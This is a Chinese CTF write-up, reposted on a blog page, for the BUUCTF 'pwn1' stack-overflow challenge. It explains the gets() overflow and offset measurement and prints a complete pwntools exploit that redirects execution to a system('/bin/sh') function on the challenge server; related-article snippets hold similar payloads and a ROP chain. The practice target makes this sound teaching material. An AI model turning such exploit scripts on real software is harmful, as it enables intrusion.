Buuctf pwn1 详细wp

最新推荐文章于 2024-06-13 21:31:31 发布
最新推荐文章于 2024-06-13 21:31:31 发布
阅读量2.5k 收藏 4
点赞数 3
文章标签: shell python
原文链接:http://www.cnblogs.com/luoleqi/p/11552356.html
版权

目录

程序基本信息

1271708-20190919193210434-130613162.png

我们可以看到这是一个64程序,没有保护开启。

程序溢出点

1271708-20190919193544889-1052588420.png

gets函数可以读取无限字符,存在栈溢出。
接下来我们测测需要多少字符长度可以溢出。
我们可以直接从ida上看到
1271708-20190919194133983-1297948357.png

变量s在栈上[bp-Fh]位置,也就是说我们只能输入(Fh + 8)(覆盖rbp需要8个字节)的字节就能覆盖到栈底rbp,紧跟栈底的便是返回地址,我们可以接上一个我们想要程序跳转到的地址。
当然ida显示大部分情况下栈偏移都是没问题的,但也有例外,所以最好手测一下溢出长度。
ida和gdb都可以测溢出长度,这里我介绍gdb的方法。
首先生成50个每4个字符都是独一无二的字符串
1271708-20190919195208493-1387492009.png

然后用gdb调试程序并把该字符串输入
1271708-20190919195332570-247946240.png

我们看到程序运行到ret发生了错误
1271708-20190919195902877-920422211.png

此时栈上的情况
1271708-20190919200044894-1502155491.png

我们可以看到,rsp处本来应该是返回地址,现在已经被我们输入的字符串覆盖了。
由于程序是小端法,所以agaa就在0x7fffffffe108处,我们只要知道agaa前有多少字符即可。
1271708-20190919200531992-1908882055.png

由于cyclic生成的字符串每四个字符都是唯一的,所以只要我们-l命令输入四个字符,它就能测算出这四个字符前有几个字符。(一个字符占一字节)
可以看到结果为23 = ida显示的Fh + 8

确定返回地址

现在我们已经可以成功劫持rip到我们想要的运行地址,哪要跳转到哪里才能pwn掉程序呢?
我们发现程序有一个函数fun()
1271708-20190919201319891-1489718678.png

执行了system("/bin/sh"),/bin/sh是一个软连接,它指向某一个shell,所以这个命令会开启一个shell,将rip劫持到这里,我们就能成功pwn掉程序。

编写exp脚本

直接附上exp

/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch = 'amd64', os = 'linux', timeout = 1)   #初始化上下文环境,主要是系统、架构和读取超时时间

io = remote('pwn.buuoj.cn', 6001)   #此处的IP地址和端口需要根据目标修改

system_addr = 0x401186  #函数fun()的地址

payload = ''                    
payload += 'A'*23           #使用23个任意字符填充
payload += p64(system_addr) #返回地址覆盖为fun函数的地址,当主程序运行完返回时便会跳转到fun()函数并执行

io.sendline(payload)            #向程序输入payload,注意使用sendline()或者send()的数据末尾加上回车'\n'
io.interactive()

成功getshell

运行脚本成功获得flag
1271708-20190919202351882-965165217.png

转载于:https://www.cnblogs.com/luoleqi/p/11552356.html

anxiong1803
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1426
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 420
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
buuctf-rip
最新发布
Nike_name的博客
06-13 359
利用get危险函数和system/bin/sh 的栈溢出
buuctf pwn入门1
weixin_63231007的博客
07-07 1075
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5682
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
buuctf pwn1_sctf_2016
wp568的博客
10-05 218
看到有.‘rodata:0000000000400684 00000008 C /bin/sh’,点进去看。read()并没有限制输入,显然存在栈溢出漏洞。存在后门函数,函数起始位置400596。拖入IDA,shift+F12查看。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
pwn1 一道pwn练习题
05-07
pwn练习题
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1286
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1155
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1464
buuctf:pwn题pwn1_sctf_2016(细致分析)
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4951
BUU CTF PWN 入门知识详解
CTFpwn总结 入门
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2007
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUUCTF|PWN-pwn1_sctf_2016
Rt1Text的博客
04-23 583
1.checksec+运行 32位+NX保护
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以...如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值